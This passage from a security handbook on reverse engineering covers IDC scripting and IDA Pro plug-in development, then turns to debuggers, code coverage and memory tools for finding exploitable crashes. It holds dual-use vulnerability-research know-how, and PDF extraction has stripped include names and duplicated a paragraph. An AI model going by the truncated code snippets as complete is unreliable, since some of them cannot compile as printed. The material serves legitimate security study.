static demoIdcFunc(val, addr) {
if (addr > 0x4000000) {
return addr + val; // return an int
}
else {
return "Bad addr"; //return a string
}
}
• IDC offers most C control structures, including if, while, for, and do. The break
and continue statements are available within loops. There is no switch statement.
As with C, all statements must terminate with a semicolon. C-style bracing with
{ and } is used.
• Most C-style operators are available in IDC. Operators that are not available
include += and all other operators of the form
Gray Hat Hacking: The Ethical Hacker’s Handbook
326
Chapter 13: Advanced Static Analysis with IDA Pro
327
PART IV
• There is no array syntax available in IDC. Sparse arrays are implemented as
named objects via the CreateArray, DeleteArray, SetArrayLong, SetArrayString,
GetArrayElement, and GetArrayId functions.
• Strings are a native data type in IDC. String concatenation is performed using
the + operator, while string comparison is performed using the == operator.
There is no character data type; instead use strings of length one.
• IDC understands the #define and #include directives. All IDC scripts executed
from files must have the directive #include
include this file.
• IDC script files must contain a main function as follows:
static main() {
//idc statements
}
Executing IDC Scripts
There are two ways to execute an IDC script, both accessible via IDA’s File menu. The first
method is to execute a stand-alone script using the File | IDC File menu option. This will
bring up a file open dialog box to select the desired script to run. A stand-alone script has
the following basic structure:
#include
/*
* Other idc files may be #include'd if you have split your code
* across several files.
*
* Standalone scripts can have no global variables, but can have
* any number of functions.
*
* A standalone script must have a main function
*/
static main() {
//statements for main, beginning with any variable declarations
}
The second method for executing IDC commands is to enter just the commands you wish
to execute in a dialog box provided by IDA via the File | IDC Command menu item. In this
case, you must not enter any function declarations or #include directives. IDA wraps the
statements that you enter in a main function and executes them, so only statements that
are legal within the body of a function are allowed here. Figure 13-5 shows an example of
the Hello World program implemented using the File | IDC Command.
IDC Script Examples
While there are many IDC functions available that provide access to your IDA databases, a
few functions are relatively essential to know. These provide minimal access to read and
write values in the database, output simple messages, and control the cursor location within
the disassembly view. Byte(addr), Word(addr), and Dword(addr) read 1, 2, and 4 bytes
respectively from the indicated address. PatchByte(addr, val), PatchWord(addr, val), and
Gray Hat Hacking: The Ethical Hacker’s Handbook
328
PatchDword(addr, val) patch 1, 2, and 4 bytes respectively at the indicated address. Note
that the use of the PatchXXX functions changes only the IDA database; they have no effect
whatsoever on the original program binary. Message(format, …) is similar to the C printf
command, taking a format string and a variable number of arguments, and printing the
result to the IDA message window. If you want a carriage return, you must include it in your
format string. Message provides the only debugging capability that IDC possesses, as no
IDC debugger is available. Additional user interface functions are available that interact with
a user through various dialog boxes. AskFile, AskYN, and AskStr, can be used to display a
file selection dialog box, a simple yes/no dialog box, and a simple one-line text input dialog
box, respectively. Finally, ScreenEA() reads the address of the current cursor line, while
Jump(addr)moves the cursor (and the display) to make addr the current address in the disassembly
view.
Scripts can prove useful in a wide variety of situations. Halvar’s BugScam vulnerability
scanner is implemented as a set of IDC scripts. One situation in which scripts come in
very handy is for decoding data or code within a binary that may have been obfuscated
in someway. Scripts are useful in this case to mimic the behavior of the program in order
to avoid the need to run the program. Such scripts can be used to modify the database in
much the same way that the program would modify itself if it were actually running. The
following script demonstrates the implementation of a decoding loop using IDC to
modify a database:
//x86 decoding loop | //IDC Decoding loop
mov ecx, 377 | auto i, addr, val;
mov esi, 8049D2Eh | addr = 0x08049D2E;
mov edi, esi | for (i = 0; i < 377; i++) {
loc_8049D01: | val = Byte(addr);
lodsb | val = val ^ 0x4B;
xor al, 4Bh | PatchByte(addr, val);
stosb | addr++;
loop loc_8049D01 | }
Figure 13-5 IDC command execution
Chapter 13: Advanced Static Analysis with IDA Pro
329
PART IV
IDA Pro Plug-In Modules and the IDA SDK
IDC is not suitable for all situations. IDC lacks the ability to define complex data structures,
perform efficient dynamic memory allocation, access native programming APIs
such as those in the C standard library or Windows API, and does not provide access into
the lowest levels of IDA databases. Additionally, in cases where speed is required, IDC
may not be the most suitable choice. For these situations, IDA provides an SDK (Software
Development Kit) that publishes the C++ interface specifications for the native
IDA API. The IDA SDK enables the creation of compiled C++ plug-ins as extensions to
IDA Pro. The SDK is included with recent IDA distributions or is available as a separate
download from the DataRescue website. A new SDK is released with each new version of
IDA, and it is imperative that you use a compatible SDK when creating plug-ins for your
version of IDA. Compiled plug-ins are generally compatible only with the version of the
IDA that corresponds to the SDK with which the plug-inwas built. This can lead to problems
when plug-in authors fail to provide new plug-in binaries for each new release of
IDA. As with other IDA documentation the SDK documentation is rather sparse. API
documentation is limited to the supplied SDK header files, while documentation for
compiling and installing plug-ins is limited to a few readme files. A great guide for learning
to write plug-ins was published in 2005 by Steve Micallef, and covers build environment
configuration as well as many useful API functions. His plug-in writing tutorial is a
must read for anyone who wants to learn the nuts and bolts of IDA plug-ins.
Basic Plug-In Concept
First, the plug-in API is published as a set of C++ header (.hpp) files in the SDK’s include
directory. The contents of these files are the ultimate authority on what is or is not available
to you in the IDA SDK. There are two essential files that each plug-in must include:
variable inf. The inf variable is populated with information about the current database,
such as processor type, program entry point, minimum and maximum virtual address
values, and much more. Plug-ins that are specific to a particular processor or file format
can examine the contents of the inf variable to learn whether they are compatible with
the currently loaded file. Loader.hpp defines the plugin_t structure and contains the
appropriate declaration to export a specific instance of a programmer-defined plugin_t.
This is the single most important structure for plug-in authors, as it is mandatory to
declare a single global plugin_t variable named PLUGIN. When a plug-in is loaded into
IDA, IDA examines the exported PLUGIN variable to locate several function pointers
that IDA uses to initialize, execute, and terminate each plug-in. The plug-in structure is
defined as follows:
class plugin_t {
public:
int version; // Set this to IDP_INTERFACE_VERSION
int flags; // plugin attributes often set to 0
// refer to loader.hpp for more info
int (idaapi* init)(void); // plugin initialization function, called once for
// each database that is loaded. Return value
// indicates how Ida should treat the plugin
Gray Hat Hacking: The Ethical Hacker’s Handbook
330
void (idaapi* term)(void); // plugin termination function. called when a
// plugin is unloaded. Can be used for plugin
// cleanup or set to NULL if no cleanup required.
void (idaapi* run)(int arg); // plugin execution function. This is the function
// that is called when a user activates the plugin
// using the Edit menu or assigned plugin hotkey
char *comment; // Long description of the plugin. Not terribly
// important.
char *help; // Multiline help about the plugin
char *wanted_name; // The name that will appear on the
// Edit/Plugins submenu
char *wanted_hotkey; // The hotkey sequence to activate the plugin
// "Alt-" or "Shift-F9" for example
};
An absolutely minimal plug-in that does nothing other than print a message to IDA’s
message window appears next.
NOTE Wanted_hotkey is just that, the hot key you want to use. IDA makes no
guarantee that your wanted_hotkey will be available, as more than one plug-in
may request the same hotkey sequence. In such cases, the first plug-in that IDA
loads will be granted its wanted_hotkey, while subsequent plug-ins that request
the same hotkey will only be able to be activated by using the Edit | Plugins menu.
#include
#include
#include
int idaapi my_init(void) { //idaapi marks this as stdcall
//Keep this plugin regardless of processor type
return PLUGIN_KEEP; //refer to loader.hpp for valid return values
}
void idaapi my_run(int arg) { //idaapi marks this as stdcall
//This is where we should do something interesting
static int count = 0;
//The msg function is equivalent to IDC's Message
msg("Plugin activated %d time(s)\n", ++count);
}
char comment[] = "This is a simple plugin. It doesn't do much.";
char help[] =
"A simple plugin\n\n"
"That demonstrates the basics of setting up a plugin.\n\n"
"It doesn't do a thing other than print a message.\n";
char name[] = "GrayHat plugin";
char hotkey[] = "Alt-1";
plugin_t PLUGIN = {
IDP_INTERFACE_VERSION, 0, my_init, NULL, my_run,
comment, help, name, hotkey
};
The IDA SDK includes source code, along with make files and Visual Studio workspace
files for several sample plug-ins. The biggest hurdle faced by prospective plug-in authors
Chapter 13: Advanced Static Analysis with IDA Pro
331
PART IV
is learning the IDA API. The plug-in API is far more complex than the API presented for
IDC scripting. Unfortunately, plug-in API function names do not match IDC API function
names; though generally if a function exists in IDC, you will be able to find a similar
function in the plug-in API. Reading the plug-in writer’s guide along with the SDKsupplied
headers and the source code to existing plug-ins is really the only way to learn
how to write plug-ins.
Building IDA Plug-Ins
Plug-ins are essentially shared libraries. On the Windows platform, this equates to a
DLL. When building a plug-in, you must configure your build environment to build a
DLL and link to the required IDA libraries. The process is covered in detail in the plug-in
writer’s guide and many examples exist to assist you. The following is a summary of configuration
settings that you must make:
1. Specify build options to build a shared library.
2. Set plug-in and architecture-specific defines __IDP__, and __NT__ or __LINUX__.
3. Add the appropriate SDK library directory to your library path. The SDK contains
a number of libXXX directories for use with various build environments.
4. Add the SDK include directory to your include directory path.
5. Link with the appropriate ida library (ida.lib, ida.a, or pro.a).
6. Make sure your plug-in is built with an appropriate extension (.plw for
Windows, .plx for Linux).
Once you have successfully built your plug-in, installation is simply a matter of copying
the compiled plug-in to IDA’s plug-in directory. This is the directory within your IDA
program installation, not within your SDK installation. Any open databases must be
closed and reopened in order for IDA to scan for and load your plug-in. Each time a
database is opened in IDA, every plug-in in the plugins directory is loaded and its init
function executed. Only plug-ins whose init functions return PLUGIN_OK or PLUGIN_
KEEP (refer to loader.hpp) will be kept by IDA. Plug-ins that return PLUGIN_SKIP will
not be made available for current database.
The IDAPython Plug-In
The IDAPython plug-in by Gergely Erdelyi is an excellent example of extending the
power of IDA via a plug-in. The purpose of IDAPython is to make scripting both easier
and more powerful at the same time. The plug-in consists of two major components: an
IDA plug-in written in C++ that embeds a Python interpreter into the current IDA process,
and a set of Python APIs that provides all of the scripting capability of IDC. By making
all of the features of Python available to a script developer, IDAPython provides both
an easier path to IDA scripting, because users can leverage their knowledge of Python
Gray Hat Hacking: The Ethical Hacker’s Handbook
332
rather than learning a new language—IDC, and a much more powerful scripting interface,
because all of the features of Python including data structures and APIs become
available to the script author. A similar plug-in named IDARub was created by Spoonm
to bring Ruby scripting to IDA as well.
The x86emu Plug-In
The x86emu plug-in by Chris Eagle addresses a different type of problem for the IDA
user, that of analyzing obfuscated code. All too often, malware samples, among other
things, employ some form of obfuscation technique to make disassembly analysis more
difficult. The majority of obfuscation techniques employ some form of self-modifying
code that renders static disassembly listings all but useless other than to analyze the deobfuscation
algorithms. Unfortunately, the de-obfuscation algorithms seldom contain
the malicious behavior of the code being analyzed, and as a result, the analyst is unable
to make much progress until the code can be de-obfuscated and disassembled yet again.
Traditionally, this has required running the code under the control of a debugger until
the de-obfuscation has been completed, then capturing a memory dump of the process,
and finally, disassembling the captured memory dump. Unfortunately, many obfuscation
techniques have been developed that attempt to thwart the use of debuggers and
virtual machine environments. The x86emu plug-in embeds an x86 emulator within
IDA and offers users the opportunity to step through disassembled code as if it were
loaded into memory and running. The emulator treats the IDA database as its virtual
memory and provides an emulation stack, heap, and register set. If the code being emulated
is self-modifying, then the emulator reflects the modifications in the loaded database.
In this way emulation becomes the tool to both de-obfuscate the code and to
update the IDA database to reflect all self-modifications without ever running the malicious
code in question. X86emu will be discussed further in Chapter 21.
IDA Pro Loaders and Processor Modules
The IDA SDK can be used to create two additional types of extensions for use with IDA.
IDA processor modules are used to provide disassembly capability for new or unsupported
processor families; while IDA loader modules are used to provide support for new
or unsupported file formats. Loaders may make use of existing processor modules, ormay
require the creation of entirely new processor modules if the CPU type was previously
unsupported. An excellent example of a loader module is one designed to parse ROM
images from gaming systems. Several example loaders are supplied with the SDK in the ldr
subdirectory, while several example processor modules are supplied in the module subdirectory.
Loaders and processor modules tend to be required far less frequently than plugin
modules, and as a result, far less documentation and far fewer examples exist to assist in
their creation. At their heart, both have architectures similar to plug-ins.
Chapter 13: Advanced Static Analysis with IDA Pro
333
PART IV
Loader modules require the declaration of a global loader_t (from loader.hpp) variable
named LDSC. This structure must be set up with pointers to two functions, one to
determine the acceptability of a file for a particular loader, and the other to perform the
actual loading of the file into the IDA database. IDA’s interaction with loaders is as
follows:
1. When a user chooses a file to open, IDA invokes the accept_file function for
every loader in the IDA loaders subdirectory. The job of the accept_file function
is to read enough of the input file to determine if the file conforms to the
format recognized by the loader. If the accept_file function returns a nonzero
value, then the name of the loader will be displayed for the user to choose
from. Figure 13-3 shows an example in which the user is being offered the
choice of three different ways to load the program. In this case, two different
loaders (pe.ldw and dos.ldw) have claimed to recognize the file format while
IDA always offers the option to load a file as a raw binary file.
2. If the user elects to utilize a given loader, the loader’s load_file function is called
to load the file content into the database. The job of the loader can be as complex
as parsing files, creating program segments within IDA, and populating those
segments with the correct content from the file, or it can be as simple as passing
off all of that work to an appropriate processor module.
Loaders are built in much the same manner as plug-ins, the primary difference being the
file extension, which is .ldw for Windows loaders, and .llx for Linux loaders. Install compiled
loaders into the loaders subdirectory of your IDA distribution.
IDA processor modules are perhaps the most complicated modules to build. Processor
modules require the declaration of a global processor_t (defined in idp.hpp) structure
named LPH. This structure must be initialized to point to a number of arrays and
functions that will be used to generate the disassembly listing. Required arrays define
the mapping of opcode names to opcode values, the names of all registers, and a variety
of other administrative data. Required functions include an instruction analyzer whose
job is simply to determine the length of each instruction and to split the instruction’s
bytes into opcode and operand fields. This function is typically named ana and generates
no output. An emulation function typically named emu is responsible for tracking
the flow of the code and adding additional target instructions to the disassembly queue.
Output of disassembly lines is handled by the out and out_op functions, which are
responsible for generating disassembly lines for display in the IDA disassembly window.
There are a number of ways to generate disassembly lines via the IDA API, and the best
way to learn them is by reviewing the sample processor modules supplied with the IDA
SDK. The API provides a number of buffer manipulation primitives to build disassembly
lines a piece at a time. Output generation is performed by writing disassembly line
parts into a buffer then, once the entire line has been assembled, writing the line to the
IDA display. Buffer operations should always begin by initializing your output buffer
using the init_output_buffer function. IDA offers a number of OutXXX and out_xxx
functions that send output to the buffer specified in init_output_buffer. Once a line has
been constructed, the output buffer should be finalized with a call to term_output_
buffer before sending the line to the IDA display using the printf_line function.
The majority of available output functions are define in the SDK header file ua.hpp.
Finally, one word concerning building processor modules: while the basic build process
is similar to that used for plug-ins and loaders, processor modules require an additional
post-processing step. The SDK provides a tool named mkidp, which is used to insert a
description string into the compiled processor binary. For Windows modules, mkidp
expects to insert this string in the space between the MSDOS header and the PE header.
Some compilers, such as g++, in the author’s experience do not leave enough space
between the two headers for this operation to be performed successfully. The IDA SDK
does provide a custom DOS header stub named simply stub designed as a replacement
for the default MSDOS header. Getting g++ to use this stub is not an easy task. It is recommended
that Visual Studio tools be used to build processor modules for use on Windows.
By default, Visual Studio leaves enough space between the MSDOS and PE
headers for mkidp to run successfully. Compiled processor modules should be installed
to the IDA procs subdirectory.
References
Open RCE Forums www.openrce.org
Data Rescue IDA Customer Forums www.datarescue.com/cgi-bin/ultimatebb.cgi
IDA Plugin Writing Tutorial www.binarypool.com/idapluginwriting/
IDAPython plug-in http://d-dome.net/idapython/
IDARub plug-in www.metasploit.com/users/spoonm/idarub/
x86emu plug-in http://ida-x86emu.sourceforge.net/
Gray Hat Hacking: The Ethical Hacker’s Handbook
334
CHAPTER14 Advanced Reverse
Engineering
In this chapter, you will learn about the tools and techniques used for runtime detection
of potentially exploitable conditions in software.
• Why should we try to break software?
• Review of the software development process
• Tools for instrumenting software
• Debuggers
• Code coverage tools
• Profiling tools
• Data flow analysis tools
• Memory monitoring tools
• What is “fuzzing”?
• Basic fuzzing tools and techniques
• A simple URL fuzzer
• Fuzzing unknown protocols
• SPIKE
• SPIKE Proxy
• Sharefuzz
In the previous chapter we took a look at the basics of reverse engineering source code
and binary files. Conducting reverse engineering with full access to the way in which an
application works (regardless of whether this is a source view or binary view) is called
white box testing. In this chapter, we take a look at alternative methodologies, often
termed black box and gray box testing; both require running the application that we are
analyzing. In black box testing, you know no details of the inner workings of the application,
while gray box testing combines white box and black box techniques in which
you might run the application under control of a debugger, for example. The intent of
these methodologies is to observe how the application responds to various input stimuli.
The remainder of this chapter discusses howto go about generating interesting input
values and how to analyze the behaviors that those inputs elicit from the programs you
are testing.
335
Why Try to Break Software?
In the computer security world, debate always rages as to the usefulness of vulnerability
research and discovery. Other chapters in this book discuss some of the ethical issues
involved, but in this chapter we will attempt to stick to practical reasons. Consider the
following facts:
• There is no regulatory agency for software reliability.
• Virtually no software is guaranteed to be free from defects.
• Most end-user license agreements (EULAs) require the user of a piece of
software to hold the author of the software free from blame for any damage
caused by the software.
Given these circumstances, who is to blame when a computer system is broken into
because of a newly discovered vulnerability in an application or the operating system
that happens to be running on that computer? Arguments are made either way, blaming
the vendor for creating the vulnerable software in the first place, or blaming the user for
failing to quickly patch or otherwise mitigate the problem. The fact is, given the current
state of the art in intrusion detection, users can only defend against known threats. This
leaves the passive user completely at the mercy of the vendor and ethical security
researchers to discover vulnerabilities and report them in order for vendors to develop
patches for those vulnerabilities before those same vulnerabilities are discovered and
exploited in a malicious fashion. The most aggressive sysadmin whose systems always
have the latest patches applied will always be at the mercy of those that possess zero-day
exploits. Vendors can’t develop patches for problems that they are unaware of or refuse
to acknowledge (which defines the nature of a zero-day exploit).
If you believe that vendors will discover every problem in their software before others
do, and you believe that those vendors will release patches for those problems in an
expeditious manner, then this chapter is probably not for you. This chapter (and others
in this book) is for those people who want to take at least some measure of control in
ensuring that their software is as secure as possible.
The Software Development Process
We will avoid any in-depth discussion of how software is developed, and instead
encourage you to seek out a textbook on software engineering practices. In many cases,
software is developed by some orderly, perhaps iterative, progression through the following
activities:
• Requirements analysis What the software needs to do
• Design Planning out the pieces of the program and considering how they will
interact
• Implementation Expressing the design in software source code
Gray Hat Hacking: The Ethical Hacker’s Handbook
336
PART IV
• Testing Ensuring that the implementation meets the requirements
• Operation and support Deployment of the software to end-users and
support of the product in end-user hands
Problems generally creep into the software during any of the first three phases. These
problems may ormay not be caught in the testing phase. Unfortunately, those problems
that are not caught in testing are destined to manifest themselves after the software is
already in operation. Many developerswant to see their code operational as soon as possible
and put off doing proper error checking until after the fact. While they usually
intend to return and implement proper error checks once they can get some piece of
code working properly, all too often they forget to return and fill in the missing error
checks. The typical end-user has influence over the software only in its operational
phase. A security conscious end-user should always assume that there are problems that
have avoided detection all the way through the testing phase. Without access to source
code and without resorting to reverse engineering program binaries, end-users are left
with little choice but to develop interesting test cases and to determine whether programs
are capable of securely handling these test cases. A tremendous number of software
bugs are found simply because a user provided unexpected input to a program.
One method of testing software involves exposing the software to large numbers of
unusual input cases. This process is often termed stress testing when performed by the
software developer. When performed by a vulnerability researcher, it is usually called
fuzzing. The difference in the two is that the software developer has a far better idea of
how he expects the software to respond than the vulnerability researcher, who is often
hoping to simply record something anomalous.
Fuzzing is one of the main techniques used in black/gray box testing. To fuzz effectively,
two types of tools are required, instrumentation tools and fuzzing tools. Instrumentation
tools are used to pinpoint problem areas in programs either at runtime or
during post-crash analysis. Fuzzing tools are used to automatically generate large numbers
of interesting input cases and feed them to programs. If an input case can be found
that causes a program to crash, you make use of one or more instrumentation tools to
attempt to isolate the problem and determine whether it is exploitable.
Instrumentation Tools
Thorough testing of software is a difficult proposition at best. The challenge to the tester
is to ensure that all code paths behave predictably under all input cases. To do this, test
cases must be developed that force the program to execute all possible instructions
within the program. Assuming the program contains error handling code, these tests
must include exceptional cases that cause execution to pass to each error handler. Failure
to perform any error checking at all, and failure to test every code path, are just two
of the problems that attackers may take advantage of. Murphy’s Law assures us that it
will be the one section of code thatwas untested that will be the one that is exploitable.
Chapter 14: Advanced Reverse Engineering
337
Without proper instrumentation it will be difficult to impossible to determine why a
program has failed. When source code is available, it may be possible to insert “debugging”
statements to paint a picture of what is happening within a program at any given
moment. In such a case, the program itself is being instrumented and you can turn on as
much or as little detail as you choose. When all that is available is a compiled binary, it is
not possible to insert instrumentation into the program itself. Instead, you must make
use of tools that hook into the binary in various ways in your attempt to learn as much as
possible about how the binary behaves. In searching for potential vulnerabilities, it
would be ideal to use tools that are capable of reporting anomalous events, because the
last thing you want to do is sort through mounds of data indicating that a program is
running normally. We will cover several types of software testing tools and discuss their
applicability to vulnerability discovery. The following classes of tools will be reviewed:
• Debuggers
• Code coverage analysis tools
• Profiling tools
• Flow analysis tools
• Memory use monitoring tools
Debuggers
Debuggers provide fine-grain control over an executing program and can require a fair
amount of operator interaction. During the software development process, they are
most often used for isolating specific problems rather than large scale automated testing.
When you use a debugger for vulnerability discovery, however, you take advantage
of the debugger’s ability to both signal the occurrence of an exception, and provide a
precise snapshot of a program’s state at the moment it crashes. During black box testing
it is useful to launch programs under the control of a debugger prior to any fault injection
attempts. If a black box input can be generated to trigger a program exception,
detailed analysis of the CPU registers and memory contents captured by the debugger
makes it possible to understand what avenues of exploitation might be available as a
result of a crash.
The use of debuggers needs to be well thought out. Threaded programs and programs
that fork can be difficult for debuggers to follow.
NOTE A fork operation creates a second copy, including all state, variable, and
open file information, of a process. Following the fork, two identical processes
exist distinguishable only by their process IDs. The forking process is termed
the parent and the newly forked process is termed the child. The parent and
child processes continue execution independently of each other.
Following a fork operation, a decision must be made to follow and debug the child
process, or to stick with and continue debugging the parent process. Obviously, if you
Gray Hat Hacking: The Ethical Hacker’s Handbook
338
choose the wrong process, you may completely fail to observe an exploitable opportunity
in the opposing process. For processes that are known to fork, it is occasionally an
option to launch the process in nonforking mode. This option should be considered if
black box testing is to be performed on such an application. When forking cannot be
prevented, a thorough understanding of the capabilities of your debugger is a must. For
some operating system/debugger combinations it is not possible for the debugger to follow
a child process after a fork operation. If it is the child process you are interested in
testing, some way of attaching to the child after the fork has occurred is required.
NOTE The act of attaching a debugger to a process refers to using a
debugger to latch onto a process that is already running. This is different from
the common operation of launching a process under debugger control. When
a debugger attaches to a process, the process is paused and will not resume
execution until a user instructs the debugger to do so.
When using a GUI-based debugger, attaching to a process is usually accomplished via
a menu option (such as File | Attach) that presents a list of currently executing processes.
Console-based debuggers, on the other hand, usually offer an attach command that
requires a process ID obtained from a process listing command such as ps.
In the case of network servers, it is common to fork immediately after accepting a new
client connection in order to allow a child process to handle the new connection while
the parent continues to accept additional connection requests. By delaying any data
transmission to the newly forked child, you can take the time to learn the process ID of
the new child and attach to it with a debugger. Once you have attached to the child, you
can allow the client to continue its normal operation (usually fault injection in this
case), and the debugger will catch any problems that occur in the child process rather
than the parent. The GNU debugger, gdb, has an option named follow-fork-mode
designed for just this situation. Under gdb, follow-fork-mode can be set to parent,
child, or ask, such that gdb will stay with the parent, follow the child, or ask the user
what to do when a fork occurs.
NOTE gdb’s follow-fork-mode is not available on all architectures.
Another useful feature available in some debuggers is the ability to analyze a core
dump file. A core dump is simply a snapshot of a process’s state, including memory contents
and CPU register values, at the time an exception occurs in a process. Core dumps
are generated by some operating systems when a process terminates as a result of an
unhandled exception such as an invalid memory reference. Core dumps are particularly
useful when attaching to a process is difficult to accomplish. If the process can be made
to crash, you can examine the core dump file and obtain all of the same information you
would have gotten had you been attached to the process with a debugger at the moment
PART IV
Chapter 14: Advanced Reverse Engineering
339
it crashed. Core dumps may be limited in size on some systems (they can take up quite a
bit of space), and may not appear at all if the size limit is set to zero. Commands to
enable the generation of core files vary from system to system. On a Linux system using
the bash shell, the command to enable core dumps looks like this:
# ulimit –c unlimited
The last consideration for debuggers is that of kernel versus user space debugging.
When performing black box testing of user space applications, which includes most network
server software, user space debuggers usually provide adequate monitoring capabilities.
OllyDbg, written by Oleh Yuschuk, and WinDbg (available from Microsoft) are
two user space debuggers for the Microsoft Windows family of operating systems. gdb is
the principle user space debugger for Unix/Linux operating systems.
To monitor kernel level software such as device drivers, kernel level debuggers are
required. Unfortunately, in the Linux world at least, kernel level debugging tools are not terribly
sophisticated at the moment. On the Windows side, Microsoft’s WinDbg has become
the kernel debugger of choice following the demise of Compuware’s SoftIce product.
Code Coverage Tools
Code coverage tools give developers an idea of what portions of their programs are actually
getting executed. Such tools are excellent aids for test case development. Given
results that show what sections of code have and have not been executed, additional test
cases can be designed to cause execution to reach larger and larger percentages of the
program. Unfortunately, coverage tools are generally more useful to the software developer
than to the vulnerability researcher. They can point out the fact that you have or
have not reached a particular section of code, but indicate nothing about the correctness
of that code. Further complicating matters, commercial coverage tools often integrate
into the compilation phase of program development. This is obviously a problem if you
are conducting black box analysis of a binary program, as you will not be in possession
of the original source code.
There are two principal cases in which code coverage tools can assist in exploit development.
One case arises when a researcher has located a vulnerability by some other means
and wishes to understand exactly how that vulnerability can be triggered by understanding
how data flows through the program. The second case is in conjunction with fuzzing
tools to understand what percentage of an application has been reached via generated
fuzzing inputs. In the second case, the fuzzing process can be tuned to attempt to reach
code that is not getting executed initially. Here the code coverage tool becomes an essential
feedback tool used to evaluate the effectiveness of the fuzzing effort.
Pedram Amini’s Process Stalker is a powerful, freely available code coverage tool
designed to perform in the black box testing environment. Process Stalker consists of two
principal components and some post-processing utilities. The heart of Process Stalker is
its tracing module, which requires a list of breakpoints and the name or process ID of a
Gray Hat Hacking: The Ethical Hacker’s Handbook
340
PART IV
process to stalk as input. Breakpoint lists are currently generated using an IDA Pro plug-in
module that extracts the block structure of the program from an IDA disassembly and
generates a list of addresses that represent the first instruction in each basic block within
the program. At the same time, the plug-in generates GML (Graph Modeling Language)
files to represent each function in the target program. These graph files form the basis of
Process Stalker’s visualization capabilities when they are combined with runtime information
gathered by the tracer. As an aside, these graph files can be used with third-party
graphing tools such as GDE Community Edition from www.oreas.com to provide an alternative
to IDA’s built-in graphing capabilities. The tracer is then used to attach to or launch
the desired process, and it sets breakpoints according to the breakpoint list. Once breakpoints
have been set, the tracer allows the target program to continue execution and the
tracer makes note of all breakpoints that are hit. The tracer can optionally clear each
breakpoint when the breakpoint is hit for the first time in order to realize a tremendous
speedup. Recall that the goal of code coverage is to determine whether all branches have
been reached, not necessarily to count the number of times they have been reached. To
count the number of times an instruction has been executed, breakpoints must remain in
place for the lifetime of the program. Setting breakpoints on every instruction in a program
would be very costly from a performance perspective. To reduce the amount of overhead
required, Process Stalker, like BinDiff, leverages the concept of a basic block of code.
When setting breakpoints, it is sufficient to set a breakpoint only on the first instruction of
each basic block, since a fundamental property of basic blocks is that once the first
instruction in a block is hit, all remaining instructions in the block are guaranteed to be
executed in order. As the target program runs under the tracer’s control, the tracer logs
each breakpoint that is hit and immediately resumes execution of the target program. A
simple example of determining the process ID of a Windows process and running a trace
on it is shown in the following:
# tasklist /FI "IMAGENAME eq calc.exe"
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
calc.exe 1844 Console 0 2,704 K
# ./process_stalker -a 1844 -b calc.exe.bpl -r 0 --one-time --no-regs
For brevity, the console output of process_stalker is omitted. The example shows how a
process ID might be obtained, using the Windows tasklist command, and then passed
to the process_stalker command to initiate a trace. The process_stalker command
expects to be told the name of a breakpoint list, calc.exe.bpl in this case, which was previously
generated using the IDA plug-in component of Process Stalker. Once a trace is
complete, the post-processing utilities (a set of Python scripts) are used to process and
merge the trace results to yield graphs annotated with the gathered trace data.
Profiling Tools
Profiling tools are used to develop statistics about how much time a program spends in
various sections of code. This might include information on how frequently a particular
Chapter 14: Advanced Reverse Engineering
341
Gray Hat Hacking: The Ethical Hacker’s Handbook
342
function is called, and how much execution time is spent in various functions or loops.
Developers utilize this information in an attempt to improve the performance of their
programs. The basic idea is that performance can be visibly improved by making the
most commonly used portions of code very fast. Like coverage tools, profiling tools may
not be of tremendous use in locating vulnerabilities in software. Exploit developers care
little whether a particular program is fast or slow; they care simply whether the program
can be exploited.
Flow Analysis Tools
Flow analysis tools assist in understanding the flow of control or data within a program.
Flow analysis tools can be run against source code or binary code, and often generate
various types of graphs to assist in visualizing how the portions of a program interact.
IDA Pro offers control flow visualization through its graphing capabilities. The graphs
that IDA generates are depictions of all of the cross-referencing information that IDA
develops as it analyzes a binary. Figure 14-1 shows a function call tree generated by IDA
for a very simple program using IDA’s Xrefs From (cross-references from) menu option.
In this case we see all of the functions referenced from a function named sub_804882F,
and the graph answers the question “Where do we go from here?” To generate such a display,
IDA performs a recursive descent through all functions called by sub_804882F.
Graphs such as that in Figure 14-1 generally terminate at library or system calls for
which IDA has no additional information.
Another useful graph that IDA can generate comes from the Xrefs To option. Cross-references
to a function lead us to the points at which a function is called and answers the
question “How did we get here?” Figure 14-2 is an example of the cross-references to the
function send in a simple program. The display reveals the most likely points of origin for
data that will be passed into the send function (should that function ever get called).
Graphs such as that in Figure 14-2 often ascend all the way up to the entry point of a
program.
Figure 14-1
Function call tree
for function sub_
804882F
A third type of graph available in IDA Pro is the function flowchart graph. As shown
in Figure 14-3, the function flowchart graph provides a much more detailed look at the
flow of control within a specific function.
One shortcoming of IDA’s graphing functionality is that many of the graphs it generates
are static, meaning that they can’t be manipulated, and thus they can’t be saved for
viewing with third-party graphing applications. This shortcoming is addressed by
BinNavi and to some extent Process Stalker.
The preceding examples demonstrate control flow analysis. Another form of flow analysis
examines the ways in which data transits a program. Reverse data tracking attempts
to locate the origin of a piece of data. This is useful in determining the source of data
supplied to a vulnerable function. Forward data tracking attempts to track data from its
point of origin to the locations in which it is used. Unfortunately, static analysis of data
through conditional and looping code paths is a difficult task at best. For more information
on data flow analysis techniques, please refer the Chevarista tool mentioned in
Chapter 12.
Memory Monitoring Tools
Some of the most useful tools for black box testing are those that monitor the way that a
program uses memory at runtime. Memory monitoring tools can detect the following
types of errors:
• Accessing uninitialized memory
• Access outside of allocated memory areas
• Memory leaks
• Multiple release (freeing) of memory blocks
PART IV
Chapter 14: Advanced Reverse Engineering
343
Figure 14-2
Cross-references
to the send
function
CAUTION Dynamic memory allocation takes place in a program’s heap space.
Programs should return all dynamically allocated memory to the heap
manager at some point. When a program loses track of a memory block by
modifying the last pointer reference to that block, it no longer has the ability
to return that block to the heap manager. This inability to free an allocated block is called
a memory leak. While memory leaks may not lead directly to exploitable conditions, the
leaking of a sufficient amount of memory can exhaust the memory available in the
Gray Hat Hacking: The Ethical Hacker’s Handbook
344
Figure 14-3 IDA-generated flowchart for sub_80487EB
PART IV
Chapter 14: Advanced Reverse Engineering
345
program heap. At a minimum this will generally result in some form of denial of service.
Dynamic memory allocation takes place in a program’s heap space. Programs should return
all dynamically allocated memory to the heap manager at some point. When a program
loses track of a memory block by modifying the last pointer reference to that block, it no
longer has the ability to return that block to the heap manager. This inability to free an
allocated block is called a memory leak.
Each of these types of memory problems has been known to cause various vulnerable
conditions from program crashes to remote code execution.
valgrind
valgrind is an open source memory debugging and profiling system for Linux x86 program
binaries. valgrind can be used with any compiled x86 binary; no source code is
required. It is essentially an instrumented x86 interpreter that carefully tracks memory
